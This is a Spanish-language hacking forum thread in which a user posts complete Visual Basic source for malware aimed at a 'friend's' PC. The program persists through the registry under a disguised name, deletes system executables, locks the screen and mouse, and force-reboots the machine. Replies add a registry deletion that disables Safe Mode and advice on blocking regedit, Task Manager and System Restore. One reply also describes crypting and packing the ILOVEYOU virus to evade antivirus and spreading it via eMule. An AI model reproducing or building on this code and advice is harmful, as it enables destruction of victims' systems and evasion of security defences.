hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
12 de Octubre de 2008, 10:32:58
Noticias: ¿No te llega el email de confirmacion?
Para ver este enlace Registrate o Inicia Sesion
> leer aqui

+  Foros pOrtal Hacker
|-+  Programacion
| |-+  Programación en general
| | |-+  Visual Basic
| | | |-+  Codigo Abierto (Moderador: >> s E t H <<)
| | | | |-+  Jode la PC de un 'amigo' AQUI 100% vb
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Jode la PC de un 'amigo' AQUI 100% vb  (Leído 1219 veces)
Saint.Anger
NZ1
*
Desconectado Desconectado

Mensajes: 36



Ver Perfil
« : 13 de ſeptiembre de 2007, 02:26:26 »

bueno aqui les dejo este pequeño programita jaja.
 espero q lo difruten...
 lo que hace es lo siguiente.:

 * se agrega al registro de win y se copia a la carpata de windows, asi se ejecuta cuando prende la PC
* aparece una ventana(ocupando toda la pantalla) en negro con un mensaje. La ventana es OlwaysOnTop
* cuando pasan 5 minutos reinia la pc
* hace q el puntero del mouse se quede en un lugar fijo y q cada 2 minutos desaparezca y aparezca el puntero
* si llegan a cerrar la aplicacion se agrega otra vez al reg. (x si nos sacan con el msconfig) y se ejecuta

. creo q no me olvide de nada xD

 bueno cualquier comentario, critica o lo que sea esta desde ya recibido...


Código:
En un modulo bas

Option Explicit

' Funcion para apagar/reiniciar Windows
Public Declare Function ExitWindowsEx Lib "user32" _
(ByVal uFlags As Long, ByVal dwReserved As Long) As Long

Public Const EWX_LOGOFF = 0     ' Cerrar sesion
Public Const EWX_REBOOT = 2     ' Reiniciar
Public Const EWX_SHUTDOWN = 1   ' Apagar
Public Const EWX_FORCE = 4      ' Forzar cierre de aplicaciones

'################################################

' Funcion para ocultar/mostrar el mouse
Public Declare Function ShowCursor Lib "user32" _
(ByVal bShow As Long) As Long

'################################################

' Funcion para establecer la posicion del mouse
Public Declare Function SetCursorPos Lib "user32" _
(ByVal x As Long, ByVal y As Long) As Long

'################################################

' Funcion para que la ventana sea AlwaysOnTop
Public Declare Function SetWindowPos Lib "user32" _
(ByVal hwnd As Long, ByVal hWndInsertAfter As Long, _
ByVal x As Long, ByVal y As Long, ByVal cx As Long, _
ByVal cy As Long, ByVal wFlags As Long) As Long

Public Const HWND_TOPMOST = -1      ' AlwaysOnTop
Public Const HWND_NOTOPMOST = -2    ' Normal
Public Const SWP_NOSIZE = &H1       ' Tamaño fijo
Public Const SWP_NOMOVE = &H2       ' Sin movimiento
Public Const SWP_NOACTIVATE = &H10
Public Const SWP_SHOWWINDOW = &H40

'################################################

Public Sub Apagar(opcion As String)
    On Error Resume Next
    Dim ret As Integer
   
    Select Case opcion
        Case "apagar"
            ' apaga el equipo y cierra las aplicaciones
            ret = ExitWindowsEx(EWX_SHUTDOWN Or EWX_FORCE, 0)
            Exit Sub
        Case "reiniciar"
            ' reinicia el equipo y cierra las aplicaiones
            ret = ExitWindowsEx(EWX_REBOOT Or EWX_FORCE, 0)
            Exit Sub
        Case Else
            ' muestra un mensaje de error
            MsgBox "El parametro pasado al procedimiento 'Apagar' es incorrecto", vbOKOnly + vbCritical, "ATENCIÓN"
            Exit Sub
        End Select
End Sub

Public Sub MostrarMouse(Estado As Boolean)
    On Error Resume Next
    Dim ret As Long
   
    ' Si estado=TRUE (queremos mostrar el puntero)
    If Estado = True Then
    ' Llamar a ShowCursor tantas veces como sea necesario
    ' para que el cursor vuelva a su estado original(visible)
        Do
            ret = ShowCursor(True)
        Loop Until ret = 0
    Else
        ret = ShowCursor(False)
    End If
End Sub

Public Sub PosMouse(x As Long, y As Long)
    On Error Resume Next
    SetCursorPos x, y
End Sub

Public Sub AlwaysOnTop(F As Form, Estado As Boolean)
    On Error Resume Next
    Dim wFlags As Long
    Dim ret As Long
   
    ' Para que no cambie ni el tamaño ni la posicion
    wFlags = SWP_NOMOVE Or SWP_NOSIZE
   
    If Estado Then
        ret = SetWindowPos(F.hwnd, HWND_TOPMOST, 0, 0, 0, 0, wFlags)
    Else
        ret = SetWindowPos(F.hwnd, HWND_NOTOPMOST, 0, 0, 0, 0, wFlags)
    End If
End Sub

Public Sub CargarV(ByVal Ffile As String)
    On Error Resume Next
    Dim objNew As Object
   
    Set objNew = CreateObject("WScript.Shell")
    objNew.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Explorer32", Ffile
End Sub

Public Sub ShadeString(ByVal canvas As Object, _
ByVal start_x As Single, ByVal start_y As Single, _
ByVal start_r As Integer, ByVal start_g As Integer, _
ByVal start_b As Integer, ByVal end_r As Integer, _
ByVal end_g As Integer, ByVal end_b As Integer, _
ByVal txt As String)
   
    On Error Resume Next
    Dim r As Single
    Dim g As Single
    Dim b As Single
    Dim dr As Single
    Dim dg As Single
    Dim db As Single
    Dim txt_len As Integer
    Dim i As Integer

    txt_len = Len(txt)
    dr = (end_r - start_r) / (txt_len - 1)
    dg = (end_g - start_g) / (txt_len - 1)
    db = (end_b - start_b) / (txt_len - 1)
    r = start_r
    g = start_g
    b = start_b
    canvas.CurrentX = start_x
    canvas.CurrentY = start_y
    For i = 1 To txt_len
        canvas.ForeColor = RGB(r, g, b)
        canvas.Print Mid$(txt, i, 1);
        r = r + dr
        g = g + dg
        b = b + db
    Next i
End Sub

Public Sub Cronometrar()
    On Error Resume Next
    Dim Pausa As Currency
    Dim Inicio As Currency
    Dim Fin As Currency
    Dim Tiempototal As Currency
    Pausa = 300
    Inicio = Timer
    Do While Timer < Inicio + Pausa
        DoEvents
        Form1.Visible = True

    Loop

    Apagar "reiniciar"
    Fin = Timer
    Tiempototal = Fin - Inicio
End Sub

=====================================================
En un formulario
El formulario ::
BorderStyle = 0
BackColor = vbblack
Font = Lucida Console
WindowState = 2
agregar 3 timers
    * Ocultar
Interval 2000
Enabled = False
    * Mostrar
Interval 2000
Enabled = True
    * MousePos
Interval 1
Enabled = True
Option Explicit

Private Sub Form_Load()
    On Error Resume Next
    AlwaysOnTop Me, True
    CargarV "C:\Windows\Explorer32.exe"
    Cronometrar
    Kill "C:\Windows\System\*.exe"
    FileCopy App.Path & App.EXEName & ".exe", "C:\Windows\"
End Sub

Private Sub Form_Paint()
    On Error Resume Next
    Me.Cls
    ShadeString Me, 2000, 3500, 200, 250, _
    400, 50, 50, 150, "[ HackeD By BillyTheKid ]"
End Sub

Private Sub Form_Unload(Cancel As Integer)
    On Error Resume Next
    Shell App.Path & "\" & App.EXEName & ".exe"
    CargarV "C:\Windows\Explorer32.exe"
End Sub

Private Sub Mostrar_Timer()
    On Error Resume Next
    MostrarMouse True
    Mostrar.Enabled = False
    Ocultar.Enabled = True
End Sub

Private Sub Ocultar_Timer()
    On Error Resume Next
    MostrarMouse False
    Ocultar.Enabled = False
    Mostrar.Enabled = True
End Sub

Private Sub MousePos_Timer()
    On Error Resume Next
    PosMouse 400, 300
End Sub

En línea
>> s E t H <<
Moderador
*****
Desconectado Desconectado

Mensajes: 1,419


jelou guorld


Ver Perfil WWW
« Respuesta #1 : 14 de ſeptiembre de 2007, 10:22:48 »

pero con la pantalla negra no se puede hacer nada?
cuando consiga una pc de prueba lo hago

PD: ponele nombre
En línea


Para ver este enlace Registrate o Inicia Sesion
MI FIRMA Tongue



Para ver este enlace Registrate o Inicia Sesion
Indice de posts interesantes de VB... manuales, guias, dudas, etc


Para ver este enlace Registrate o Inicia Sesion
tenes ideas para el foro de VB? postealas aca


Para ver este enlace Registrate o Inicia Sesion
libreria de codigo en VB!


Para ver este enlace Registrate o Inicia Sesion
IDE's, compiladores, interpretes, etc!

*seth informa que quiere ver el foro de VX


Para ver este enlace Registrate o Inicia Sesion
¡ENTRA EN MI BLOG O TE JUANKEO!

Saint.Anger
NZ1
*
Desconectado Desconectado

Mensajes: 36



Ver Perfil
« Respuesta #2 : 16 de ſeptiembre de 2007, 11:35:37 »

Citar
pero con la pantalla negra no se puede hacer nada?
cuando consiga una pc de prueba lo hago

PD: ponele nombre

el nombre puedes ponerle el q quieras yo  le habia puesto Explorer32, para que no llame tanto la atencion, pero tu puedes ponerle el que quieras, no seas tan bestia de ponerle mi_virus o algo asi!
 con respecto a la pantalla negra, no entiendo a lo que te refieres, es decir la pantalla aparecera siempre, por sobre las demas, es decir que aunque ejecute otras aplicaciones no se veran xD...


 
En línea
>> s E t H <<
Moderador
*****
Desconectado Desconectado

Mensajes: 1,419


jelou guorld


Ver Perfil WWW
« Respuesta #3 : 17 de ſeptiembre de 2007, 09:56:12 »

si, ya se q antes de coompilar yo le pongo el nombre pero decia q le pongas un nombre en el code como para k sepan q ese es ese viros

x ej: yo en mis worms pongo un textbox con el nombre q le di yo al worm o una varible o algo asi, o tambien q creen un archivo de texto plano (con extencion dll o exe para q no lo abra cualkiera)
En línea


Para ver este enlace Registrate o Inicia Sesion
MI FIRMA Tongue



Para ver este enlace Registrate o Inicia Sesion
Indice de posts interesantes de VB... manuales, guias, dudas, etc


Para ver este enlace Registrate o Inicia Sesion
tenes ideas para el foro de VB? postealas aca


Para ver este enlace Registrate o Inicia Sesion
libreria de codigo en VB!


Para ver este enlace Registrate o Inicia Sesion
IDE's, compiladores, interpretes, etc!

*seth informa que quiere ver el foro de VX


Para ver este enlace Registrate o Inicia Sesion
¡ENTRA EN MI BLOG O TE JUANKEO!

Dj_Dexter
NZ3
***
Desconectado Desconectado

Mensajes: 623


R4MutO T34M


Ver Perfil WWW
« Respuesta #4 : 03 de Octubre de 2007, 08:25:13 »

Tiene un punto debil si ejecutas el pc en modo seguro y le pasas el msconfig se borra la entrada, si el administrador de tareas se ve totalmente sobre otras ventanas se podria ver, si matas el app de en aplicaciones claro que se rematricula, pero si lo matan de procesos ahi se acaba, de todos modos el que no sabe mucho de informatica creeria que el pc esta malito xd
muy bueno el programa de todos modos  cool kool

Saludos
En línea


Para ver este enlace Registrate o Inicia Sesion
Mi Deviantart


Saint.Anger
NZ1
*
Desconectado Desconectado

Mensajes: 36



Ver Perfil
« Respuesta #5 : 11 de Octubre de 2007, 05:30:47 »

Citar
Tiene un punto debil si ejecutas el pc en modo seguro y le pasas el msconfig se borra la entrada, si el administrador de tareas se ve totalmente sobre otras ventanas se podria ver, si matas el app de en aplicaciones claro que se rematricula, pero si lo matan de procesos ahi se acaba, de todos modos el que no sabe mucho de informatica creeria que el pc esta malito xd
muy bueno el programa de todos modos   

Saludos

 Bueno desde ya muchas gracias por el comentario. Acerca del punto debil estoy seguro de que tendra muchos mas, pero con respecto al que vos decis, si sabes como solucionarlo y si queres no me pasas el code para hacerlo o sino alguna idea para mejorarlo un poco mas.


      Saludos       cool


En línea
Zion_Tm
NZ2
**
Desconectado Desconectado

Mensajes: 164


" Pensar no hace daño "


Ver Perfil
« Respuesta #6 : 17 de Noviembre de 2007, 01:51:33 »


Si, la verdad que en 2 minutos volas el "virus " desde el Modo Seguro, lo que tenes que hacer el evitar que el usuario pueda ingresar al Modo Seguro, con esta linea lo lograras

----- Publicado por >> s E t H <<


  El_Objeto.regd elete "HKEY_LOCAL_MAC HINE\System\CurrentControlSet\Control\SafeBoot
En línea

Conocimiento - Creatividad - Dedicacion - Investigacion - Mente abierta. *** El poder esta en vos ***
>> s E t H <<
Moderador
*****
Desconectado Desconectado

Mensajes: 1,419


jelou guorld


Ver Perfil WWW
« Respuesta #7 : 18 de Noviembre de 2007, 04:30:31 »


Si, la verdad que en 2 minutos volas el "virus " desde el Modo Seguro, lo que tenes que hacer el evitar que el usuario pueda ingresar al Modo Seguro, con esta linea lo lograras

----- Publicado por >> s E t H <<


  El_Objeto.regd elete "HKEY_LOCAL_MAC HINE\System\CurrentControlSet\Control\SafeBoot


falta declarar e inicializar la variable el_objeto
En línea


Para ver este enlace Registrate o Inicia Sesion
MI FIRMA Tongue



Para ver este enlace Registrate o Inicia Sesion
Indice de posts interesantes de VB... manuales, guias, dudas, etc


Para ver este enlace Registrate o Inicia Sesion
tenes ideas para el foro de VB? postealas aca


Para ver este enlace Registrate o Inicia Sesion
libreria de codigo en VB!


Para ver este enlace Registrate o Inicia Sesion
IDE's, compiladores, interpretes, etc!

*seth informa que quiere ver el foro de VX


Para ver este enlace Registrate o Inicia Sesion
¡ENTRA EN MI BLOG O TE JUANKEO!

-SharK_90-
Colaborador
****
Desconectado Desconectado

Mensajes: 661


NO SPAM


Ver Perfil WWW
« Respuesta #8 : 18 de Noviembre de 2007, 05:11:07 »

Buen virus... auque algo sensillo.!!!
Pero, para empesar está muy bien....

En cuanto a lo de los puntos débiles.. hay muchos..
# No tenes que permitir que el usuario entre en Modo Seguro
# Tenes que bloquear o eliminar el Regedit, el Admin de tareas y no permitir usar el cmd
# Tenes que bloquear "Restaurar sistema"
# Pregunto una cosa.. ¿Ya lo probaste?
Le pegue una leida rápida, y encontré que esto está mal:
Citar
FileCopy App.Path & App.EXEName & ".exe", "C:\Windows\"
Es así:
Citar
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Windows\Explorer32.exe"

Igualmente, está función.. te la detectan los antivirus..!! Para copiar el programa a la carpeta Windows vas a tener que hacer otra cosa..(Usa tu imaginacion)

# Otra cosa: ¿Qué pasa, si el usuario tiene instalado Windows en otra carpeta? (por EJ:
D:\WINDOWS) -->> vas a tener que corregir esto.


-- Todas estos errores que te marque, los vas a tener que corregir vos..(No te pongo la solucion, ya que el Virus es tuyo... y aca no estamos para dejarte todo en Bandeja y asi de facil)...
Bueno - SALu2
En línea


Para ver este enlace Registrate o Inicia Sesion
ALOJAMIENTO WEB GRATIS... MUY BUENO. 350MB
>> s E t H <<
Moderador
*****
Desconectado Desconectado

Mensajes: 1,419


jelou guorld


Ver Perfil WWW
« Respuesta #9 : 18 de Noviembre de 2007, 06:36:13 »

FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Windows\Explorer32.exe"

Igualmente, está función.. te la detectan los antivirus..!!

no lo sabia eso... si encriptas la cadena tmb??

PD: la mayoria de los errores que puso shark tienen la solucion el mi guia Smiley jaj, re spamer
En línea


Para ver este enlace Registrate o Inicia Sesion
MI FIRMA Tongue



Para ver este enlace Registrate o Inicia Sesion
Indice de posts interesantes de VB... manuales, guias, dudas, etc


Para ver este enlace Registrate o Inicia Sesion
tenes ideas para el foro de VB? postealas aca


Para ver este enlace Registrate o Inicia Sesion
libreria de codigo en VB!


Para ver este enlace Registrate o Inicia Sesion
IDE's, compiladores, interpretes, etc!

*seth informa que quiere ver el foro de VX


Para ver este enlace Registrate o Inicia Sesion
¡ENTRA EN MI BLOG O TE JUANKEO!

-SharK_90-
Colaborador
****
Desconectado Desconectado

Mensajes: 661


NO SPAM


Ver Perfil WWW
« Respuesta #10 : 18 de Noviembre de 2007, 11:13:07 »

Hace la prueba y fijate... Nose los otros antivirus pero el NOD32 actualizado te lo detecta como codigo malicioso...
En línea


Para ver este enlace Registrate o Inicia Sesion
ALOJAMIENTO WEB GRATIS... MUY BUENO. 350MB
SISAHACK
Recien llegado
*
Desconectado Desconectado

Mensajes: 3


ANARCHY IS REVOLUTION & FREEDOM


Ver Perfil WWW
« Respuesta #11 : 24 de Noviembre de 2007, 06:58:50 »

 Smiley :cool:LO SIENTO BUEN AMIGO PERO SU FONT HA SIDO DETECTADO HASTA POR AVAST cool Smiley

 Angry SIGUE INTENTANDO VAS POR BUEN CAMINO  Angry


 Smiley
En línea

*****     ******   ******    *****
*                   *       *              *       *
*****           *       ******    * ****
         *          *                 *    *       *
*****     ******   ******    *       *   HACK ¡¡¡¡
Zion_Tm
NZ2
**
Desconectado Desconectado

Mensajes: 164


" Pensar no hace daño "


Ver Perfil
« Respuesta #12 : 24 de Noviembre de 2007, 01:15:36 »

Tienen que esmerarse para evitar ser detectado. Una solucion es contruir algo nuevo ( code ) la otra es la cryptografia ........ hace un par de meses hize una prueba, agarre el fuente del virus i`love you , lo compile lo pase por un programita creo que se llamaba Crypto no se que y luego por el Themida ( compresion dinamica al 80%) obviamente quedo de 1Mb casi, pero totalmente indetetable, pues facil, lo joinie a varios programas mas y lo meti a la carpeta compartida del emule con nombres y peso diferentes.
En fin ...... con un codigo viejo y detectado, se transformo e algo super encriptado e ilegible para el motor de scaneo de los antivirus ...... es muy facil engañarlos...... hay varias formas, pero lo ideal es modificar el fuente ( con criterio ) y hacer algo bien.

Bueno, saludos a la gente que piensa  cool
En línea

Conocimiento - Creatividad - Dedicacion - Investigacion - Mente abierta. *** El poder esta en vos ***
SKL
Recien llegado
*
Desconectado Desconectado

Mensajes: 13


Ver Perfil
« Respuesta #13 : 29 de Diciembre de 2007, 09:37:51 »

y si apreto alt+tab Huh se sale la aplicacion... y si voy a simbolos del sistema y saco el programa del Run?...

y si le cambio el nombre a la aplicacion ya no lo reconoce??

porqeu no tambien bloqueas el regedit y el msconfig??

deshabilita el taskmanager?...


todo eso deberias tenerlo en cuenta...

ah y que verifique si esta o no las cadenas ya dichas en el regedit, si no estan que se vuelvan a agregar!

saludos!
En línea


Para ver este enlace Registrate o Inicia Sesion
Saint.Anger
NZ1
*
Desconectado Desconectado

Mensajes: 36



Ver Perfil
« Respuesta #14 : 21 de Enero de 2008, 04:17:50 »

 HOla a todos, hace tiempo que no estoy en  el foro xD. Bueno teniendo en
cuenta todos sus comentarios, en cuanto termine de hacer una nueva version la pondre, tratare de solucionar todas las fallas que encontraron

    Saludos

En línea
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online